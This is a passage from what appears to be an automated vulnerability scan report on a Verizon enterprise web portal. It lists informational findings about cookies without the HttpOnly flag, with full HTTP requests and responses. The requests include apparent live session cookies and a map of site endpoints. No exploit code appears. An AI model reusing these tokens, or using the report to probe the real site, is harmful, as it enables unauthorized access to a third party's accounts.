GET /enterprisesolutions/Repairs/iRepairs/Images/systemBusy.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1474
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:11 GMT
ETag: "5c2-4e228ad3"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89aQ...............mm............!..NETSCAPE2.0.....!..    ....,....Q....fh...0.I..8...-`(.Di.........:b].......;..a..aB...[..%Z..m2....8.is..w.F......e...h...f.d8^...........    .!.......,....Q....mx
...[SNIP]...

10.37. https://enterprisecenter.verizon.com/enterprisesolutions/global/gHome.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/global/gHome.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/global/gHome.do HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:25:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:25:22 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:22 GMT
Content-Length: 0


10.38. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/javascript/selfreg.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/selfreg/javascript/selfreg.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/javascript/selfreg.js HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: application/x-javascript
Last-Modified: Sun, 17 Jul 2011 07:10:54 GMT
ETag: W/"20e6-4e228afe"
Vary: accept-encoding
Cache-Control: private, max-age=28800
Date: Mon, 05 Sep 2011 22:22:43 GMT
Content-Length: 8422
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:42 GMT

function change(id, newClass)
{
       var theElement = document.getElementById(id);
       theElement.className = newClass;
}

function checkUserID()
{
       var userID = document.getElementById('userID');
       //a
...[SNIP]...

10.39. https://enterprisecenter.verizon.com/enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/selfreg/submitEnrollmentProfileInfo.do HTTP/1.1
Host: enterprisecenter.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html
Location: https://www22.verizon.com/ifederation/SmMakeCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=$SM$https%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fselfreg%2fsubmitEnrollmentProfileInfo%2edo
Vary: accept-encoding
Expires: Mon, 05 Sep 2011 22:35:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:35:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:35:23 GMT
Content-Length: 0


10.40. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1145
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "479-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

...[SNIP]...

10.41. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_VEC_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 841
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "349-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

...[SNIP]...

10.42. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Main.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 2234
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "8ba-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

...[SNIP]...

10.43. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/Logo_Vz_Popup.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 1435
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "59b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7185
Date: Mon, 05 Sep 2011 22:40:48 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:48 GMT

...[SNIP]...

10.44. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 51
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "33-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


10.45. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 115
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "73-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT


10.46. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/staticcontent/images/VzWIntegration/box_bottom_right.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

